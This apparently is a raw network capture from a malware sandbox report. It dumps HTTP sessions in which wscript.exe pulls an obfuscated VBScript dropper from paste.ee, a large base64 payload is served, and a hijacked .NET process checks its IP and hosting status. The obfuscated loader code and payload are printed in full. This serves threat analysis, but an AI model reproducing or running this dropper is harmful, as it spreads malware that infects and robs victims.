          Data Ascii: BEREVwQARERFFEQERUhABEREVgACtCoEbcQUO4QAgQACMUQEBEREVIgCBEREVIgBHEBCF0RnAKRmAKRmAKBCBEREVIADBEREVIQBREQERUhAFEQERUhAFEQERUhAFEQERUhAGEQERUhCBEREVoQARERFF0RFHQUBdAAIEEKgSEQAgYQpAGRoAKRACASCF0RABASBIggCBEREVIQDBEREVIgBHAhDIEAAEggDd0QARERFCwQARER
          Jun 14, 2024 15:15:15.517282009 CEST1236INData Raw: 43 41 53 42 49 45 51 41 41 51 41 44 42 45 41 41 45 55 51 45 41 41 41 42 47 41 41 41 44 49 41 41 41 4d 51 42 41 41 77 41 4f 34 51 41 41 51 51 44 42 45 41 49 45 34 51 42 64 45 41 41 46 67 41 41 67 4d 51 41 41 41 77 41 4f 67 42 47 43 41 51 42 4f 67
          Data Ascii: CASBIEQAAQADBEAAEUQEAAABGAAADIAAAMQBAAwAO4QAAQQDBEAIE4QBdEAAFgAAgMQAAAwAOgBGCAQBOgRAAQACAAwAOAAADEAAgMQBREQAgUgABEAIEwAAgMQBRAAIEkI40khVcp3tI0AAgMgCAAyAE8AAAQACIgACI4gDGAQCAIz4bZUNAq8tKB1Fb+qCN3CAAgHAUCQnAkIA8BghAMGASCwpAIIAhBwkAkHAYCAeAQJA1BA
          Jun 14, 2024 15:15:15.517318010 CEST1236INData Raw: 41 51 4b 41 51 44 67 72 41 73 4e 41 34 43 51 71 41 59 4d 41 56 44 67 7a 41 38 4d 41 38 43 41 32 41 6b 4d 41 53 43 77 73 41 63 4c 41 34 43 51 7a 41 51 4c 41 59 44 51 7a 41 63 4b 41 33 43 41 70 41 73 4a 41 62 44 41 78 41 77 4d 41 58 43 77 32 41 59
          Data Ascii: AQKAQDgrAsNA4CQqAYMAVDgzA8MA8CA2AkMASCwsAcLA4CQzAQLAYDQzAcKA3CApAsJAbDAxAwMAXCw2AYMAYDwlAQJAFDA3AgLAPDQxA0MA0CQuAsLAZDgzAkLAHDg1AALA6CwwAIJAoCQqAMMAVCwmAsNAuCAmA8KAqCQxAIJA0CgqAMc4AGAAuBggAgIALCAoA8HAICgiAEGADCQiAIIArCQnAEGAJCQYAcIAjBwipEAAKCg
          Jun 14, 2024 15:15:15.517353058 CEST1236INData Raw: 6c 64 58 5a 7a 46 6d 65 6c 52 47 41 35 39 6d 62 31 35 57 59 36 42 51 65 76 64 32 62 35 6c 57 63 31 6c 58 59 79 56 6d 5a 68 52 48 41 35 39 6d 5a 6c 68 32 62 72 56 47 62 70 5a 57 59 79 56 33 63 41 6b 48 62 69 31 57 5a 7a 4e 58 51 6e 35 57 61 30 56
          Data Ascii: ldXZzFmelRGA59mb15WY6BQevd2b5lWc1lXYyVmZhRHA59mZlh2brVGbpZWYyV3cAkHbi1WZzNXQn5Wa0V3YlhXR0V2RAkHbi1WZzNXQn5WasxWYDRXZHBQepZXYuFGbhRXai9GZhdWdkFGaAkXa0BQepFHA5lWb1RWZ5BQepdWZu9Welp2brBQepdWYuFWbhdWdmVHdpRHA5VmchNWas9mYvp2bm9Gc1B3bnBQehJncBJXYoN0
          Jun 14, 2024 15:15:15.517388105 CEST248INData Raw: 51 4a 55 51 4a 39 47 62 56 56 45 55 58 70 31 52 56 52 46 41 30 68 58 5a 55 35 53 62 6c 52 33 63 35 4e 46 41 30 56 48 65 31 5a 58 64 32 46 6d 62 68 31 47 41 30 56 48 63 30 56 33 62 33 46 47 64 31 52 57 59 6a 56 48 63 76 6c 58 64 77 39 32 59 41 51
          Data Ascii: QJUQJ9GbVVEUXp1RVRFA0hXZU5SblR3c5NFA0VHe1ZXd2Fmbh1GA0VHc0V3b3FGd1RWYjVHcvlXdw92YAQXdwRXdvZ3boV2alRWYyFmb1ZXaoBAd1BHd19Gdph2b2Vmcl5WY6lWbpRGA0VHc0V3by92chtWZrVmdhNHA0VHc0V3buFWc1ZWdoBAd1BHd192aphXaqFmahp2boF2ahRWd6VHcAQXdwRXdvpWZkBAd1BHd19mZpRW
          Jun 14, 2024 15:15:15.517420053 CEST1236INData Raw: 6c 5a 58 61 32 6c 47 63 6c 68 57 61 69 46 6d 59 41 51 58 64 77 52 58 64 76 4e 57 59 77 39 32 59 6c 4e 57 64 6b 6c 6d 63 41 51 58 64 77 35 57 61 36 6c 32 63 41 51 58 64 77 35 57 61 35 39 47 62 31 4e 57 5a 6a 39 32 64 68 5a 57 59 71 6c 32 5a 41 51
          Data Ascii: lZXa2lGclhWaiFmYAQXdwRXdvNWYw92YlNWdklmcAQXdw5Wa6l2cAQXdw5Wa59Gb1NWZj92dhZWYql2ZAQXdw5Wa59GZhdWZtBAd1BnbpdXa39mahJGA0VHcul2c1hHA0VHculmcltWa5lGalpWZt9mb1J3brV3cAQXdw5Was9mZlNXdrBAd1BnbphWZ092clRXY29GapNXY6BAd1BnbpZWasBAd1BnbpRWa3BAd112bsF2Z1FX
          Jun 14, 2024 15:15:15.517538071 CEST1236INData Raw: 4b 56 56 53 41 49 58 64 35 42 67 63 31 68 58 59 36 46 6d 65 41 49 58 64 75 42 67 63 76 70 58 5a 6e 56 57 63 41 49 33 62 30 4e 32 59 75 41 67 63 76 52 33 59 75 41 67 63 76 52 58 59 79 56 47 64 70 68 58 64 33 39 6d 64 76 5a 57 64 36 56 33 63 31 68
          Data Ascii: KVVSAIXd5Bgc1hXY6FmeAIXduBgcvpXZnVWcAI3b0N2YuAgcvR3YuAgcvRXYyVGdphXd39mdvZWd6V3c1hWaoF2ahxGAy9GdhJXZ0l2d1lXa3FGdlRXak9GelpHAy9GdhJXZ0lmdpRHAy9GdhJXZ0lmdlRXY2lmbll3byBgcvRXYyVGdpJXd0BgcvRXYyVGdpFXZqBgcvRXYyVGdpxWdzFWc1d3b0l2cvFXauBgcvRXYyVGdptW
          Jun 14, 2024 15:15:15.517573118 CEST1236INHTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Thu, 13 Jun 2024 19:52:12 GMT
          Accept-Ranges: bytes
          ETag: "743fe92ecbbdda1:0"
          Server: Microsoft-IIS/10.0
          Date: Fri, 14 Jun 2024 13:15:14 GMT
          Content-Length: 75096
          Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
          Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+gPAAAADAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
          Jun 14, 2024 15:15:15.517740965 CEST1236INHTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Thu, 13 Jun 2024 19:52:12 GMT
          Accept-Ranges: bytes
          ETag: "743fe92ecbbdda1:0"
          Server: Microsoft-IIS/10.0
          Date: Fri, 14 Jun 2024 13:15:14 GMT
          Content-Length: 75096
          Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
          Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+gPAAAADAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.854304104.16.185.241808168C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          TimestampBytes transferredDirectionData
          Jun 14, 2024 15:15:23.841526985 CEST63OUTGET / HTTP/1.1
          Host: icanhazip.com
          Connection: Keep-Alive
          Jun 14, 2024 15:15:25.230618000 CEST537INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:24 GMT
          Content-Type: text/plain
          Content-Length: 15
          Connection: keep-alive
          Access-Control-Allow-Origin: *
          Access-Control-Allow-Methods: GET
          Set-Cookie: __cf_bm=Qcbdn6cgH8KRPIsE1GCLHD5hGBokq_GF8fUgmltKZa8-1718370924-1.0.1.1-3ZClOqvk9IWb21_9Sa2OjX4LAentKuw_V_ejlYIEfk2jdKJ1rJQ7Hc7JU5f8qUU9CWo..XFkdXoP4uyXA2ZuYw; path=/; expires=Fri, 14-Jun-24 13:45:24 GMT; domain=.icanhazip.com; HttpOnly
          Server: cloudflare
          CF-RAY: 893a96c558446b32-DFW
          alt-svc: h3=":443"; ma=86400
          Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0a
          Data Ascii: 173.254.250.91
          Jun 14, 2024 15:15:25.230986118 CEST537INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:24 GMT
          Content-Type: text/plain
          Content-Length: 15
          Connection: keep-alive
          Access-Control-Allow-Origin: *
          Access-Control-Allow-Methods: GET
          Set-Cookie: __cf_bm=Qcbdn6cgH8KRPIsE1GCLHD5hGBokq_GF8fUgmltKZa8-1718370924-1.0.1.1-3ZClOqvk9IWb21_9Sa2OjX4LAentKuw_V_ejlYIEfk2jdKJ1rJQ7Hc7JU5f8qUU9CWo..XFkdXoP4uyXA2ZuYw; path=/; expires=Fri, 14-Jun-24 13:45:24 GMT; domain=.icanhazip.com; HttpOnly
          Server: cloudflare
          CF-RAY: 893a96c558446b32-DFW
          alt-svc: h3=":443"; ma=86400
          Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0a
          Data Ascii: 173.254.250.91
          Jun 14, 2024 15:15:25.231199026 CEST537INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:24 GMT
          Content-Type: text/plain
          Content-Length: 15
          Connection: keep-alive
          Access-Control-Allow-Origin: *
          Access-Control-Allow-Methods: GET
          Set-Cookie: __cf_bm=Qcbdn6cgH8KRPIsE1GCLHD5hGBokq_GF8fUgmltKZa8-1718370924-1.0.1.1-3ZClOqvk9IWb21_9Sa2OjX4LAentKuw_V_ejlYIEfk2jdKJ1rJQ7Hc7JU5f8qUU9CWo..XFkdXoP4uyXA2ZuYw; path=/; expires=Fri, 14-Jun-24 13:45:24 GMT; domain=.icanhazip.com; HttpOnly
          Server: cloudflare
          CF-RAY: 893a96c558446b32-DFW
          alt-svc: h3=":443"; ma=86400
          Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0a
          Data Ascii: 173.254.250.91


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.854305208.95.112.1808168C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          TimestampBytes transferredDirectionData
          Jun 14, 2024 15:15:26.255616903 CEST80OUTGET /line/?fields=hosting HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Jun 14, 2024 15:15:26.848088980 CEST174INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:25 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 5
          Access-Control-Allow-Origin: *
          X-Ttl: 60
          X-Rl: 44
          Data Raw: 74 72 75 65 0a
          Data Ascii: true


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.849706188.114.97.34437592C:\Windows\System32\wscript.exe
          TimestampBytes transferredDirectionData
          2024-06-14 13:15:01 UTC319OUTGET /d/3dasY HTTP/1.1
          Accept: */*
          Accept-Language: en-ch
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: paste.ee
          Connection: Keep-Alive
          2024-06-14 13:15:01 UTC1242INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:01 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Cache-Control: max-age=2592000
          strict-transport-security: max-age=63072000
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block
          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byD78xwm9MNOGzgPY3W07%2FqRYRLc%2FmuvoCjTe800a2HO%2BQbqzEYfk94zYd6Xdvzb%2FXrSFwgTY6U2cEaIkymeoKxx5fnOEyLMDEnSF%2BlMk9q%2BjbSwbUX2CL4%2B0g%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 893a96341a553ab9-DFW
          alt-svc: h3=":443"; ma=86400
          2024-06-14 13:15:01 UTC127INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 70 6f 73 74 65 72 69 64 61 64 65 20 2c 20 73 75 62 66 61 63 65 20 2c 20 62 65 72 6c 69 6e 65 6e 73 65 20 2c 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 2c 20 64 69 6f 6e 69 6e 61 20 2c 20 43 61 6d 61 20 2c 20 64 69 6f 6e 69 6e 61 31 0d 0a 20 20 20 20 20 73 75 62 66 61 63 65 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 62 65 72 6c 69 6e
          Data Ascii: 1f7f dim posteridade , subface , berlinense , malhorquino , dionina , Cama , dionina1 subface = " " berlin
          2024-06-14 13:15:01 UTC1369INData Raw: 65 6e 73 65 20 20 3d 20 22 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72
          Data Ascii: ense = "" & malhorquino & subface & malhorquino & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTr
          2024-06-14 13:15:01 UTC1369INData Raw: 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f
          Data Ascii: DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & malhorquino & subface & malhorquino
          2024-06-14 13:15:01 UTC1369INData Raw: 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20
          Data Ascii: gTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & malhorquino & subface & malhorquino & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & malhorquino &
          2024-06-14 13:15:01 UTC1369INData Raw: 67 54 72 65 58 77 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 67 44 67 54 72 65 4d 67 44 67 54 72 65 34 44 67 54 72 65 44 51 44 67 54 72 65 4d 51 44 67 54 72 65 7a 44 67 54 72 65 44 67 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26
          Data Ascii: gTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & malhorquino & subface & malhorquino & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & malhorquino &
          2024-06-14 13:15:01 UTC1369INData Raw: 72 71 75 69 6e 6f 20 26 20 22 51 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20
          Data Ascii: rquino & "QBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre"
          2024-06-14 13:15:01 UTC1099INData Raw: 6b 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 67 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69
          Data Ascii: kDgTre" & malhorquino & subface & malhorquino & "gDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & malhorquino & subface & malhorquino & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & malhorqui
          2024-06-14 13:15:01 UTC1369INData Raw: 31 36 34 63 0d 0a 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 